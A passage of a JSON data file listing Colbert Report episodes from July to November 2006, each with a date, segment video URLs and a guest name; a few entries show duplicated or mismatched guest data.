        "http://thecolbertreport.cc.com/videos/2wr9gw/stephen-s-sound-advice---blackouts",
        "http://thecolbertreport.cc.com/videos/ym3t0d/neal-katyal",
        "http://thecolbertreport.cc.com/videos/9nk4r7/sign-off---super-hero-stamps"
      ],
      "guest": "Neal Katyal"
    },
    {
      "date": "2006-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgxe8v/exclusive---better-know-a-district---district-of-columbia---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/jdsi7h/intro---7-27-06",
        "http://thecolbertreport.cc.com/videos/2pti2w/floyd-landis--balls",
        "http://thecolbertreport.cc.com/videos/0qi0dm/the-word---secretary-general-bolton",
        "http://thecolbertreport.cc.com/videos/6quypd/better-know-a-district---district-of-columbia---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/a2w76v/joe-quesada"
      ],
      "guest": "Joe Quesada"
    },
    {
      "date": "2006-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2k66vv/intro---7-31-06",
        "http://thecolbertreport.cc.com/videos/ipm2dm/book-club",
        "http://thecolbertreport.cc.com/videos/3jl3pu/bicycle-theft",
        "http://thecolbertreport.cc.com/videos/z1aahs/the-word---wikiality",
        "http://thecolbertreport.cc.com/videos/zqod1f/tip-wag---lance-bass",
        "http://thecolbertreport.cc.com/videos/6tak7c/ned-lamont"
      ],
      "guest": "Ned Lamont"
    },
    {
      "date": "2006-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b1r2b5/intro---8-1-06",
        "http://thecolbertreport.cc.com/videos/advrej/courting-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/n4ao8r/cuba-libre",
        "http://thecolbertreport.cc.com/videos/uqnkmr/the-word---uncool",
        "http://thecolbertreport.cc.com/videos/kxcfet/balls-for-kidz---carnivals",
        "http://thecolbertreport.cc.com/videos/pcfi97/peter-beinart",
        "http://thecolbertreport.cc.com/videos/wm5ib9/sign-off---energy"
      ],
      "guest": "Peter Beinart"
    },
    {
      "date": "2006-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7ofk8i/intro---8-2-06",
        "http://thecolbertreport.cc.com/videos/1jctl5/chair-for-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/tc2zff/on-notice---how-the-on-notice-board-is-made",
        "http://thecolbertreport.cc.com/videos/9f950b/the-word---single-serving",
        "http://thecolbertreport.cc.com/videos/1gkx3r/no-joe-lieberman",
        "http://thecolbertreport.cc.com/videos/m7siat/linda-hirshman",
        "http://thecolbertreport.cc.com/videos/kx6zql/sign-off---cocoa-puffs"
      ],
      "guest": "Linda Hirshman"
    },
    {
      "date": "2006-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dij1sw/war--what-it-s-good-for---intro",
        "http://thecolbertreport.cc.com/videos/gdp73x/war--what-it-s-good-for---russ-lieber",
        "http://thecolbertreport.cc.com/videos/xzhg3v/meet-an-ally---palau",
        "http://thecolbertreport.cc.com/videos/o6s4zb/paul-hackett",
        "http://thecolbertreport.cc.com/videos/cujsej/war--what-it-s-good-for---the-eternal-flame"
      ],
      "guest": "Paul Hackett"
    },
    {
      "date": "2006-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ggdajm/intro---8-8-06",
        "http://thecolbertreport.cc.com/videos/oafdpt/lieberman-no-show",
        "http://thecolbertreport.cc.com/videos/kend9g/press-room-renovations",
        "http://thecolbertreport.cc.com/videos/cru76e/the-word---ten-hut-",
        "http://thecolbertreport.cc.com/videos/ywy5cq/tek-jansen---operation--heart-of-the-phoenix---dead-or-alive",
        "http://thecolbertreport.cc.com/videos/y3ycer/bill-rhoden",
        "http://thecolbertreport.cc.com/videos/h498ah/sign-off---toss-to-jon"
      ],
      "guest": "Bill Rhoden"
    },
    {
      "date": "2006-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ku3ic/intro---8-9-06",
        "http://thecolbertreport.cc.com/videos/m3m7kz/lieberman-loses",
        "http://thecolbertreport.cc.com/videos/coxidl/delay-and-jesus",
        "http://thecolbertreport.cc.com/videos/9jopn4/the-word---pencils-down",
        "http://thecolbertreport.cc.com/videos/hpijh0/tip-wag---hungarian-bridge",
        "http://thecolbertreport.cc.com/videos/p3g7eb/alexandra-robbins"
      ],
      "guest": "Alexandra Robbins"
    },
    {
      "date": "2006-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/75wf4h/exclusive---better-know-a-district---california-s-6th---lynn-woolsey-pt--1",
        "http://thecolbertreport.cc.com/videos/m276r1/exclusive---better-know-a-district---california-s-6th---lynn-woolsey-pt--2",
        "http://thecolbertreport.cc.com/videos/8ku3ic/intro---8-9-06",
        "http://thecolbertreport.cc.com/videos/m3m7kz/lieberman-loses",
        "http://thecolbertreport.cc.com/videos/coxidl/delay-and-jesus",
        "http://thecolbertreport.cc.com/videos/9jopn4/the-word---pencils-down",
        "http://thecolbertreport.cc.com/videos/hpijh0/tip-wag---hungarian-bridge",
        "http://thecolbertreport.cc.com/videos/p3g7eb/alexandra-robbins"
      ],
      "guest": "Eli Pariser"
    },
    {
      "date": "2006-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qehfxb/intro---8-10-06",
        "http://thecolbertreport.cc.com/videos/6kvez0/liquids-on-planes",
        "http://thecolbertreport.cc.com/videos/b2svxe/the-word---cappuccino",
        "http://thecolbertreport.cc.com/videos/fyj6zj/better-know-a-district---california-s-6th---lynn-woolsey",
        "http://thecolbertreport.cc.com/videos/d573ty/eli-pariser",
        "http://thecolbertreport.cc.com/videos/hjpfzb/sign-off---remedy-for-insomnia"
      ],
      "guest": "Eli Pariser"
    },
    {
      "date": "2006-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/voo1ci/intro---8-14-06",
        "http://thecolbertreport.cc.com/videos/8c9998/peaceland",
        "http://thecolbertreport.cc.com/videos/mjxd75/french-fries",
        "http://thecolbertreport.cc.com/videos/bghbjx/jon-s-apology",
        "http://thecolbertreport.cc.com/videos/ozm5pk/stephen-s-sound-advice---protecting-your-online-identity",
        "http://thecolbertreport.cc.com/videos/u393jw/ramesh-ponnuru",
        "http://thecolbertreport.cc.com/videos/2b5c2u/sign-off---e-mail-password"
      ],
      "guest": "Ramesh Ponnuru"
    },
    {
      "date": "2006-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8rzc5/intro---8-15-06",
        "http://thecolbertreport.cc.com/videos/95fbpq/sharing-the-spotlight-with-ahmadinejad",
        "http://thecolbertreport.cc.com/videos/6qb0k5/the-word---dumb-ocracy",
        "http://thecolbertreport.cc.com/videos/2evzvd/hungarian-bridge-progress-report",
        "http://thecolbertreport.cc.com/videos/mjhnvj/all-you-need-to-know---proper-condom-use",
        "http://thecolbertreport.cc.com/videos/jdgp1k/david-gergen"
      ],
      "guest": "David Gergen"
    },
    {
      "date": "2006-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5nmn6o/intro---8-16-06",
        "http://thecolbertreport.cc.com/videos/ic96lx/alan-schlesinger",
        "http://thecolbertreport.cc.com/videos/lsglfu/the-word---el-comandante",
        "http://thecolbertreport.cc.com/videos/gb4665/let-s-make-this-happen",
        "http://thecolbertreport.cc.com/videos/2ap7v2/was-it-really-that-bad----cold-war",
        "http://thecolbertreport.cc.com/videos/5uanam/morgan-spurlock",
        "http://thecolbertreport.cc.com/videos/9nqss3/sign-off---historic-hoax"
      ],
      "guest": "Morgan Spurlock"
    },
    {
      "date": "2006-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b66unq/intro---8-17-06",
        "http://thecolbertreport.cc.com/videos/xzzu7h/continuity",
        "http://thecolbertreport.cc.com/videos/75yefr/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/kc21ru/better-know-a-district---california-s-31st",
        "http://thecolbertreport.cc.com/videos/8n3z7e/better-know-a-district---california-s-31st---javier-becerra",
        "http://thecolbertreport.cc.com/videos/nsqwib/neil-young"
      ],
      "guest": "Neil Young"
    },
    {
      "date": "2006-08-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uz7rxo/intro---8-21-06",
        "http://thecolbertreport.cc.com/videos/vzigy3/green-screen-challenge---the-announcement",
        "http://thecolbertreport.cc.com/videos/u468bk/atheists-in-foxholes",
        "http://thecolbertreport.cc.com/videos/pqlyj1/the-word---side-effects",
        "http://thecolbertreport.cc.com/videos/euqtan/threatdown---drivers-eat",
        "http://thecolbertreport.cc.com/videos/btgfsr/geoffrey-nunberg",
        "http://thecolbertreport.cc.com/videos/6p8hy2/sign-off---pants-off"
      ],
      "guest": "Geoffrey Nunberg"
    },
    {
      "date": "2006-08-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5huhm/intro---8-22-06",
        "http://thecolbertreport.cc.com/videos/xr6owy/cheating-death---fields-medal",
        "http://thecolbertreport.cc.com/videos/p4wf5t/the-word---99-problems",
        "http://thecolbertreport.cc.com/videos/8t1wv1/stephen-colbert-salutes-hungary",
        "http://thecolbertreport.cc.com/videos/6iv4i1/paul-krugman"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2006-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rsqkbw/american-pop-culture--it-s-crumbelievable----intro",
        "http://thecolbertreport.cc.com/videos/85w92g/american-pop-culture--it-s-crumbelievable----pop-culture-icons",
        "http://thecolbertreport.cc.com/videos/l7z3b3/damian-kulash",
        "http://thecolbertreport.cc.com/videos/19r90f/american-pop-culture--it-s-crumbelievable----cable-tv-vs--the-american-family",
        "http://thecolbertreport.cc.com/videos/9h0pam/gideon-yago",
        "http://thecolbertreport.cc.com/videos/l29lto/american-pop-culture--it-s-crumbelievable----stephen-steps-up"
      ],
      "guest": "Gideon Yago"
    },
    {
      "date": "2006-08-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86h1lx/intro---8-24-06",
        "http://thecolbertreport.cc.com/videos/j3gjfh/national-peach-month",
        "http://thecolbertreport.cc.com/videos/8avj2z/fart-jokes",
        "http://thecolbertreport.cc.com/videos/ejrivu/the-word---bad-boys",
        "http://thecolbertreport.cc.com/videos/sui137/30-days-with-the-colbert-report",
        "http://thecolbertreport.cc.com/videos/dw0hc5/janna-levin",
        "http://thecolbertreport.cc.com/videos/8v6ak5/green-screen-challenge---socialized-medicine"
      ],
      "guest": "Janna Levin"
    },
    {
      "date": "2006-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e2o0vm/intro---9-11-06",
        "http://thecolbertreport.cc.com/videos/ryb1sd/manilow-s-emmy",
        "http://thecolbertreport.cc.com/videos/vnwrl5/the-word---shall",
        "http://thecolbertreport.cc.com/videos/epkjf1/the-path-to-9-11",
        "http://thecolbertreport.cc.com/videos/dpqisf/martin-short",
        "http://thecolbertreport.cc.com/videos/0giino/sign-off---lullaby-clap"
      ],
      "guest": "Martin Short"
    },
    {
      "date": "2006-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zj5aco/exclusive---better-know-a-challenger---new-jersey-s-3rd---richard-sexton",
        "http://thecolbertreport.cc.com/videos/2vdm17/intro---9-12-06",
        "http://thecolbertreport.cc.com/videos/fuhxnz/green-screen-challenge---entry",
        "http://thecolbertreport.cc.com/videos/464nde/the-word---missed-opportunity",
        "http://thecolbertreport.cc.com/videos/03wv59/better-know-a-challenger---new-jersey-s-3rd---richard-sexton",
        "http://thecolbertreport.cc.com/videos/uyjgfx/toby-keith",
        "http://thecolbertreport.cc.com/videos/df7axm/sign-off---special-episode"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2006-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9h47r2/intro---9-13-06",
        "http://thecolbertreport.cc.com/videos/a7pf2u/the-colmandos",
        "http://thecolbertreport.cc.com/videos/fftk8t/the-word---caveat-emptor",
        "http://thecolbertreport.cc.com/videos/yr3sze/formidable-opponent---iraq-withdrawal",
        "http://thecolbertreport.cc.com/videos/io94jl/ken-jennings",
        "http://thecolbertreport.cc.com/videos/m6mk95/sign-off---cigarettes"
      ],
      "guest": "Ken Jennings"
    },
    {
      "date": "2006-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3i56pi/intro---9-14-06",
        "http://thecolbertreport.cc.com/videos/m82cj5/sexy-photo",
        "http://thecolbertreport.cc.com/videos/39njye/george-allen",
        "http://thecolbertreport.cc.com/videos/dmk6s2/hungarian-bridge---andras-simonyi",
        "http://thecolbertreport.cc.com/videos/ogtff2/tip-wag---nasa",
        "http://thecolbertreport.cc.com/videos/6xq5fv/bill-simmons",
        "http://thecolbertreport.cc.com/videos/czqyfe/sign-off---get-on-it--nation",
        "http://thecolbertreport.cc.com/videos/g844xc/bridge-contest"
      ],
      "guest": "Bill Simmons"
    },
    {
      "date": "2006-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wteen9/intro---9-18-06",
        "http://thecolbertreport.cc.com/videos/51grfw/whitney-houston",
        "http://thecolbertreport.cc.com/videos/82m3g9/the-word---wiper-fluid",
        "http://thecolbertreport.cc.com/videos/cyd2um/tek-jansen---operation--destiny-s-underbelly--entrapped-",
        "http://thecolbertreport.cc.com/videos/r7b7p1/will-power",
        "http://thecolbertreport.cc.com/videos/j44oq1/sign-off---bust"
      ],
      "guest": "Will Power"
    },
    {
      "date": "2006-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/spzrjp/intro---9-19-06",
        "http://thecolbertreport.cc.com/videos/dbmjaj/u-n--week",
        "http://thecolbertreport.cc.com/videos/5v40iy/the-word---tribalism",
        "http://thecolbertreport.cc.com/videos/qloab5/threatdown---toby-keith",
        "http://thecolbertreport.cc.com/videos/kf8re4/frank-rich",
        "http://thecolbertreport.cc.com/videos/ezwrh0/sign-off---fantasy-colbert-report-league"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2006-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lj5z86/green-screen-challenge---the-challenge-continues",
        "http://thecolbertreport.cc.com/videos/o1qorx/who-s-not-honoring-me-now----the-macarthur-foundation",
        "http://thecolbertreport.cc.com/videos/pz60rq/green-screen-challenge---typical-democrats",
        "http://thecolbertreport.cc.com/videos/vkr39r/stephen-s-sound-advice---high-school",
        "http://thecolbertreport.cc.com/videos/fn9d5q/james-carville",
        "http://thecolbertreport.cc.com/videos/g7hl0x/the-word---lose"
      ],
      "guest": "James Carville"
    },
    {
      "date": "2006-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yujezq/intro---9-21-06",
        "http://thecolbertreport.cc.com/videos/tvrtdg/days-of-repentance-hotline",
        "http://thecolbertreport.cc.com/videos/kxvydq/better-know-a-challenger---new-jersey-s-5th---paul-aronsohn",
        "http://thecolbertreport.cc.com/videos/u1txo4/daniel-ellsberg",
        "http://thecolbertreport.cc.com/videos/42tk7e/sign-off---pentagon-papers",
        "http://thecolbertreport.cc.com/videos/yxzh84/daniel-golden"
      ],
      "guest": "Daniel Ellsberg"
    },
    {
      "date": "2006-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ubu45l/intro---9-25-06",
        "http://thecolbertreport.cc.com/videos/918nqn/heritage",
        "http://thecolbertreport.cc.com/videos/s08yij/buy-this-book",
        "http://thecolbertreport.cc.com/videos/1tds5k/the-word---opposition-party",
        "http://thecolbertreport.cc.com/videos/az74i4/green-screen-challenge---goodbye--darth-maul-",
        "http://thecolbertreport.cc.com/videos/te8evq/fun-in-the-sun",
        "http://thecolbertreport.cc.com/videos/c88j0x/arianna-huffington"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2006-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13qtu2/intro---9-26-06",
        "http://thecolbertreport.cc.com/videos/76ov53/frank-rich-calls-in",
        "http://thecolbertreport.cc.com/videos/navjpx/the-word---good-morning",
        "http://thecolbertreport.cc.com/videos/22kzkk/four-horsemen-of-the-a-pop-calypse---justin-timberlake",
        "http://thecolbertreport.cc.com/videos/kertmr/ted-danson",
        "http://thecolbertreport.cc.com/videos/en1nzg/alpha-dog-of-the-week---tom-selleck"
      ],
      "guest": "Ted Danson"
    },
    {
      "date": "2006-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dkn6is/intro---9-27-06",
        "http://thecolbertreport.cc.com/videos/w75za8/oprah-and-friends",
        "http://thecolbertreport.cc.com/videos/2zj0db/mort-zuckerman-dials-the-atone-phone",
        "http://thecolbertreport.cc.com/videos/wq2mkf/the-word---iraq",
        "http://thecolbertreport.cc.com/videos/p20mpr/tip-wag---george-clooney",
        "http://thecolbertreport.cc.com/videos/g1anyj/lowell-bergman",
        "http://thecolbertreport.cc.com/videos/8v25i1/sign-off---world-of-colbertcraft"
      ],
      "guest": "Lowell Bergman"
    },
    {
      "date": "2006-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b0od22/intro---9-28-06",
        "http://thecolbertreport.cc.com/videos/mechk8/green-screen-challenge---ipod---colbert",
        "http://thecolbertreport.cc.com/videos/jl58qd/blitzkrieg-on-grinchitude---santa-claus--in",
        "http://thecolbertreport.cc.com/videos/a23i2j/jon-stewart-calls-in",
        "http://thecolbertreport.cc.com/videos/kby4hb/un-american-news---spain",
        "http://thecolbertreport.cc.com/videos/c2vyau/steve-wozniak"
      ],
      "guest": "Steve Wozniak"
    },
    {
      "date": "2006-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vaflyc/intro---10-2-06",
        "http://thecolbertreport.cc.com/videos/ak0wmf/mark-foley",
        "http://thecolbertreport.cc.com/videos/clzwmu/the-word---copycat",
        "http://thecolbertreport.cc.com/videos/0f7zu5/threatdown---saudi-arabia",
        "http://thecolbertreport.cc.com/videos/6cuxj4/michael-lewis",
        "http://thecolbertreport.cc.com/videos/gwcer9/sign-off---actual-apologies"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2006-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fkksjm/intro---10-3-06",
        "http://thecolbertreport.cc.com/videos/85po0w/drunk-dialing",
        "http://thecolbertreport.cc.com/videos/hnt52c/lucifer",
        "http://thecolbertreport.cc.com/videos/ap05bd/the-word---experience",
        "http://thecolbertreport.cc.com/videos/oojn49/steagle-colbeagle-the-eagle---mascot",
        "http://thecolbertreport.cc.com/videos/xqpdbq/andy-stern",
        "http://thecolbertreport.cc.com/videos/tbnr4f/sign-off---retire-the-jersey"
      ],
      "guest": "Andy Stern"
    },
    {
      "date": "2006-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pi53om/intro---10-4-06",
        "http://thecolbertreport.cc.com/videos/t3hp8a/mark-foley-the-rino",
        "http://thecolbertreport.cc.com/videos/2n2oat/the-word---must-not-see-tv",
        "http://thecolbertreport.cc.com/videos/536mbt/nobel-prize-sweep",
        "http://thecolbertreport.cc.com/videos/ga8yja/green-screen-challenge---d-d",
        "http://thecolbertreport.cc.com/videos/ps5fh4/byron-dorgan",
        "http://thecolbertreport.cc.com/videos/vbbgif/-20-million-victory-party"
      ],
      "guest": "Byron Dorgan"
    },
    {
      "date": "2006-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r5fn7m/intro---10-5-06",
        "http://thecolbertreport.cc.com/videos/t7lg5x/handling-sex-scandals",
        "http://thecolbertreport.cc.com/videos/2pcxy7/behavioral-profiling",
        "http://thecolbertreport.cc.com/videos/6qs8dt/maz-jobrani",
        "http://thecolbertreport.cc.com/videos/8vhk9f/better-know-a-district---florida-s-16th---mark-foley",
        "http://thecolbertreport.cc.com/videos/cg4ud6/amy-goodman",
        "http://thecolbertreport.cc.com/videos/mex37x/starbucks-price-hike"
      ],
      "guest": "Amy Goodman"
    },
    {
      "date": "2006-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uz4y5r/intro---10-9-06",
        "http://thecolbertreport.cc.com/videos/vcdu14/stephen-greets-kim-jong-il",
        "http://thecolbertreport.cc.com/videos/94jsyv/the-word---safety",
        "http://thecolbertreport.cc.com/videos/oqybt6/sport-report---saginaw-spirit-3-0-with-steagle-colbeagle",
        "http://thecolbertreport.cc.com/videos/sxcbbt/randy-newman"
      ],
      "guest": "Randy Newman"
    },
    {
      "date": "2006-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7x9ixq/a-salute-to-the-american-lady",
        "http://thecolbertreport.cc.com/videos/2jugk2/stephen-r-a-p-s----gender-issues",
        "http://thecolbertreport.cc.com/videos/tab5oc/jane-fonda-and-gloria-steinem",
        "http://thecolbertreport.cc.com/videos/vglnl3/ariel-levy",
        "http://thecolbertreport.cc.com/videos/6ooly1/sign-off---mrs--colbert"
      ],
      "guest": "Ariel Levy"
    },
    {
      "date": "2006-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m063rn/intro---10-11-06",
        "http://thecolbertreport.cc.com/videos/bmktr8/shout-out----from-baghdad-to-the-report",
        "http://thecolbertreport.cc.com/videos/lbop8f/stephen-cashes-in",
        "http://thecolbertreport.cc.com/videos/kpo74v/green-screen-challenge---the-final-cut",
        "http://thecolbertreport.cc.com/videos/fxyspp/green-screen-challenge---the-finalists",
        "http://thecolbertreport.cc.com/videos/n67d6e/green-screen-challenge---the-winner",
        "http://thecolbertreport.cc.com/videos/pkbxv2/tek-jansen---space-station-theta-zeus-aquarius",
        "http://thecolbertreport.cc.com/videos/8hq3dq/lightsaber-duel",
        "http://thecolbertreport.cc.com/videos/nkr8wo/green-screen---george-lucas"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2006-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d5jz3y/exclusive---better-know-a-challenger---new-jersey-s-4th---carol-gay",
        "http://thecolbertreport.cc.com/videos/yw8t41/intro---10-12-06",
        "http://thecolbertreport.cc.com/videos/dikrto/congratulatory-mail",
        "http://thecolbertreport.cc.com/videos/9dfgke/north-korean-weapons-test-scare",
        "http://thecolbertreport.cc.com/videos/htaz1s/gay-republicans---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/gtnan5/better-know-a-challenger---new-jersey-s-4th---carol-gay",
        "http://thecolbertreport.cc.com/videos/f57spg/brian-schweitzer",
        "http://thecolbertreport.cc.com/videos/o1sfrf/sign-off---revved-up"
      ],
      "guest": "Larry Miller"
    },
    {
      "date": "2006-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/plp18s/intro---10-16-06",
        "http://thecolbertreport.cc.com/videos/q81oyv/bush-impersonator-impersonator",
        "http://thecolbertreport.cc.com/videos/3yuat5/cbgb-s",
        "http://thecolbertreport.cc.com/videos/7i1kaz/the-word---russian-dolls",
        "http://thecolbertreport.cc.com/videos/rxjbs7/tip-wag---midterm-elections-edition",
        "http://thecolbertreport.cc.com/videos/2he8tk/barry-scheck",
        "http://thecolbertreport.cc.com/videos/xuvjmp/the-wave"
      ],
      "guest": "Barry Scheck"
    },
    {
      "date": "2006-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ae5ru6/intro---10-17-06",
        "http://thecolbertreport.cc.com/videos/fo3bt3/one-year-anniversary",
        "http://thecolbertreport.cc.com/videos/r8tksi/descending-screen",
        "http://thecolbertreport.cc.com/videos/18nq18/the-word---irreconcilable-differences",
        "http://thecolbertreport.cc.com/videos/hlfrbf/anniversary-cake",
        "http://thecolbertreport.cc.com/videos/is87vo/judge-tubbs",
        "http://thecolbertreport.cc.com/videos/7fe2ut/richard-dawkins",
        "http://thecolbertreport.cc.com/videos/g41j5d/second-year-portrait"
      ],
      "guest": "Richard Dawkins"
    },
    {
      "date": "2006-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nm42tm/intro---10-18-06",
        "http://thecolbertreport.cc.com/videos/szo4co/elephant-vasectomies",
        "http://thecolbertreport.cc.com/videos/bl7nra/the-word---sherlock",
        "http://thecolbertreport.cc.com/videos/jpgqk0/jeopardy",
        "http://thecolbertreport.cc.com/videos/wu6d7x/sport-report---smack-talk",
        "http://thecolbertreport.cc.com/videos/0usw0u/david-kuo",
        "http://thecolbertreport.cc.com/videos/pun0an/santorum-s-iraqi-lord-of-the-rings"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2006-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/63h5y0/exclusive---better-know-a-challenger---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/simwwd/intro---10-19-06",
        "http://thecolbertreport.cc.com/videos/zzoxmj/ebay-portrait-bid",
        "http://thecolbertreport.cc.com/videos/55o9xl/jim-gilchrist",
        "http://thecolbertreport.cc.com/videos/eh02b8/better-know-a-challenger---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/484q7z/peter-agre"
      ],
      "guest": "Matthew Dowd"
    },
    {
      "date": "2006-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xsr78j/intro---10-30-06",
        "http://thecolbertreport.cc.com/videos/501yrw/get-ready-for-barry",
        "http://thecolbertreport.cc.com/videos/fokcta/stay-the-course",
        "http://thecolbertreport.cc.com/videos/2ffwy9/the-word---shameless",
        "http://thecolbertreport.cc.com/videos/3644s2/threatdown---greatdown",
        "http://thecolbertreport.cc.com/videos/h5ly2o/barry-manilow"
      ],
      "guest": "Barry Manilow"
    },
    {
      "date": "2006-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vll3lh/intro---10-31-06",
        "http://thecolbertreport.cc.com/videos/ixb36k/costumes-for-the-girls",
        "http://thecolbertreport.cc.com/videos/qrw2en/the-word---thanks--gays-",
        "http://thecolbertreport.cc.com/videos/ya17xq/portrait-auction",
        "http://thecolbertreport.cc.com/videos/crxtpi/welcome-to-the-house-of-horrors---nancy-pelosi",
        "http://thecolbertreport.cc.com/videos/2g6dhj/tim-robbins",
        "http://thecolbertreport.cc.com/videos/9z7u1s/freak-show---log-cabin-republican"
      ],
      "guest": "Tim Robbins"
    },
    {
      "date": "2006-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fio9x5/exclusive---better-know-a-challenger---california-s-30th---david-nelson-jones",
        "http://thecolbertreport.cc.com/videos/ngeqml/intro---11-1-06",
        "http://thecolbertreport.cc.com/videos/07l6jg/john-kerry",
        "http://thecolbertreport.cc.com/videos/5a62pu/the-word---rip-off",
        "http://thecolbertreport.cc.com/videos/j449s5/better-know-a-challenger---california-s-30th---david-nelson-jones",
        "http://thecolbertreport.cc.com/videos/80bjyk/penn-jillette",
        "http://thecolbertreport.cc.com/videos/7w23zw/big-in--06"
      ],
      "guest": "Penn Jillette"
    },
    {
      "date": "2006-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c1jp7z/intro---11-2-06",
        "http://thecolbertreport.cc.com/videos/ryl8xd/a-historidocufictiomentary-of-george-allen",
        "http://thecolbertreport.cc.com/videos/ypv3hz/p-k--winsome---black-republican",
        "http://thecolbertreport.cc.com/videos/e8pbai/sport-report---the-spirit-shop",
        "http://thecolbertreport.cc.com/videos/o5x0ja/chad-walldorf--portrait-winner",
        "http://thecolbertreport.cc.com/videos/vchsrw/ron-reagan"
      ],
      "guest": "Ron Reagan Jr."
    },
    {
      "date": "2006-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5l9ww2/intro---11-6-06",
        "http://thecolbertreport.cc.com/videos/3x1o1e/saddam-s-hanging",
        "http://thecolbertreport.cc.com/videos/mfycn0/vote-your-conscience",
        "http://thecolbertreport.cc.com/videos/xjsetj/the-word---happy-ending",
        "http://thecolbertreport.cc.com/videos/yu4stw/ted-haggard-s-media-field-day",
        "http://thecolbertreport.cc.com/videos/qtoavw/what-to-expect-when-you-re-electing",
        "http://thecolbertreport.cc.com/videos/de4hy0/mark-halperin",
        "http://thecolbertreport.cc.com/videos/iuqlez/absentee-voting"
      ],
      "guest": "Mark Halperin"
    },
    {
      "date": "2006-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rdhken/midterm-midtacular---beatty---bening-confirmation-call",
        "http://thecolbertreport.cc.com/videos/vmt5dv/better-know-a-district---midterm-midtacular",
        "http://thecolbertreport.cc.com/videos/42n9bh/midterm-midtacular---update-from-the-daily-show",
        "http://thecolbertreport.cc.com/videos/gmknl3/midterm-midtacular---democrat-majority",
        "http://thecolbertreport.cc.com/videos/1qhm06/stephen-s-final-thoughts",
        "http://thecolbertreport.cc.com/videos/3fzd37/robert-wexler-and-eleanor-holmes-norton"
      ],
      "guest": "Election Night Live Show"
    },
    {
      "date": "2006-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/veyf2a/intro---11-8-06",
        "http://thecolbertreport.cc.com/videos/0085n8/the-word---sigh",
        "http://thecolbertreport.cc.com/videos/8tjdnz/better-know-a-district---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/n1c32a/tek-jansen---theme-song",
        "http://thecolbertreport.cc.com/videos/vzb4w6/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/3yplp6/special-memories"
      ],
      "guest": "Jeff Greenfield"
    },
    {
      "date": "2006-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vsle8s/intro---11-9-06",
        "http://thecolbertreport.cc.com/videos/ec6t9w/shout-out----michael-rehm",
        "http://thecolbertreport.cc.com/videos/0osdbo/the-word---putin--08",
        "http://thecolbertreport.cc.com/videos/ro28cv/p-k--winsome---a-journey-home",
        "http://thecolbertreport.cc.com/videos/sff21j/dean-kamen",
        "http://thecolbertreport.cc.com/videos/y6jo9b/sign-off---buy-american"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2006-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xhi69f/intro---11-13-06",
        "http://thecolbertreport.cc.com/videos/tq9pyg/mccain-s-depression",
